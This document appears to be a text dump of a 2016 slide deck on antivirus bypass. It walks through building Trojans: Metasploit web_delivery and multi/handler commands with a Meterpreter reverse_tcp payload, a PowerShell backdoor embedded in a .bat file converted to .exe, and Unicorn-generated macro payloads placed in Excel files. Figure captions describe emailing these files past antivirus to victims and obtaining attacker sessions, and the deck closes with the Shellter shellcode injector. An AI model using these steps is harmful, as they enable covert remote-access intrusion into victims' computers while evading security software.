Antivirus Bypass Techniques - 2016
- 2. 2 | P a g e
A. Power Shell Exploitation
1. Technique : Generating Executables (.exe & .bat) Files
Description:
Attacker create a windows executable (.exe) program which acts as a Trojan. In this technique
attacker generate a power shell command whose work is to create a webclient & embed the
backdoor inside his executable program.
How :
Attacker use Metasploit framework to generate power shell command.
use exploit/multi/script/web_delivery
show targets
set target 2
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP>
set SRVHOST <Server IP>
set URIPATH /
exploit
After creating the link attackers only task is to run the command on victim computer so, for
doing that attacker will create a batch file Eg. Notepad.bat
In Notepad.bat attacker write his code& embed the Evil Power Shell Command.
Convert the .bat file to .exe & send to victim
Result :
Figure 1. Generating PowerShell Command
- 3. 3 | P a g e
Figure 2. Embedding & Conversion of backdoor to .exe
Figure 3. Virus Total Result For Both Files
- 4. 4 | P a g e
Figure 4. Victim Executing The Program
Figure 5. Attacker Getting Sessions
- 5. 5 | P a g e
B. Macros
1. Technique : Generating Macros Enable (.xlsm) Files
Description:
Attacker creates a encoded payload using tool name Unicorn and use that payload to generate a
macro enable Microsoft excel file which acts as a Trojan.
How :
Download & install Unicorn
git clone https://github.com/trustedsec/unicorn.git
cd unicorn
python unicorn.py windows/meterpreter/reverse_tcp <Attacker IP> <Port For Listening> macro
Attacker use Metasploit framework & start handler Exploit.
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <IP>
set PORT <PORT>
exploit
Now use the generated payload and create micro enable excel file
Result :
Figure 6. Generate Payload with unicorn
- 6. 6 | P a g e
Figure 7. Attacker Machine Start Handler
Figure 8. Create a micro enable excel file with evil code
- 7. 7 | P a g e
Figure 9. Virus Total Result
Figure 10. Attaching Trojan With Email
- 8. 8 | P a g e
Figure 11. Send Trojan With Email On Different Email Vendors
Figure 12. Victim AV Bypass
- 9. 9 | P a g e
Figure 13. Victim Opens The File
Figure 14. Attacker Sessions
- 10. 10 | P a g e
C. Shellter Project
1. Technique : Shellcode injection tool
Description:
Shellter is a dynamic shellcode injection tool, and the first truly dynamic PE infector ever created.
It can be used in order to inject shellcode into native Windows applications (currently 32-bit
applications only).
The shellcode can be something yours or something generated through a framework, such as
Metasploit.
Result :
Figure 15